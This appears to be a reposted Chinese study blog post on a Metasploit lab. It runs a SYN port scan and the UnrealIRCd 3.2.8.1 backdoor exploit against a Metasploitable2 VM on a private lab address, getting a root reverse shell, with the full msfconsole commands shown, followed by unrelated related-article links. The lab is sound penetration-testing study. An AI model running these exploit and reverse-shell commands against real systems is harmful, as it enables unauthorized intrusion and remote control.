当前位置: 首页 > news >正文

第10章 metasploit(网络安全防御实战--蓝军武器库)

网络安全防御实战--蓝军武器库是2020年出版的,已经过去3年时间了,最近利用闲暇时间,抓紧吸收,总的来说,第10章开始学习利用metasploit渗透测试工具去打metasploit2虚拟机,本文我演示了metasploit端口扫描和漏洞利用,更多有趣的渗透测试实验,有待大家挖掘~

  • ailx10:metasploit渗透测试入门
  • ailx10:使用metasploit获取域散列值
  • ailx10:Meterpreter渗透测试入门

ailx10

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

1、启动metasploitable2虚拟机,拿到IP地址(192.168.85.171)

2、访问web页面,里面有很多白帽子黑客练习的靶场

3、使用root 身份 运行 kali 的 msfconsole ,对metasploitable2进行syn端口扫描

search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171

4、查看syn端口扫描结果,体验很慢,不如 nmap

5、漏洞利用,直接帮忙提权到root了,成功获得metasploitable2 后门

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run

编辑于 2023-03-24 21:47・IP 属地江苏

http://www.dtcms.com/a/55828.html

相关文章:

  • 每日一题----------异常处理
  • 【Python运维】实现高效的自动化备份与恢复:Python脚本从入门到实践
  • 数据结构---八大排序
  • Python的学习篇(七)--网页结构
  • 数据清洗与治理:为大模型预训练打造完美数据
  • Python已知后序遍历和中序遍历,求先序遍历
  • 字典树(trie树)详解
  • TCP/IP 5层协议簇:网络层(ICMP协议)
  • 如何学习编程?
  • Windows Server开启审计功能
  • Release of anyui for LVGL v0.27.0
  • grum-与gam-词源故事
  • 【数据分享】1999—2023年我国地级市污染物排放和环境治理数据
  • 【MySQL】数据库基础
  • 【计算机网络】TCP
  • Android 蓝牙OTA固件升级
  • Yashan SQL语句
  • OSCP最新备考攻略:迎接2024改版后的OSCP+认证
  • STM32-I2C通信协议
  • 苦瓜书盘官网,免费pdf/mobi电子书下载网站
  • SyntaxError: Unexpected identifier
  • 期权帮|中证1000股指期权交割结算价怎么算?
  • WEB登录认证与鉴权
  • (七)企业级高性能 WEB 服务 - HTTPS 加密
  • C语言_数据结构总结4:不带头结点的单链表
  • fopen
  • 简单的二元语言模型bigram实现
  • Maxbotix超声波测距传感器:高灵敏度与抗干扰能力,确保复杂环境中的稳定性能
  • 一周学会Flask3 Python Web开发-SQLAlchemy简介及安装
  • 4.归一化技术:深度网络中的关键优化手段——大模型开发深度学习理论基础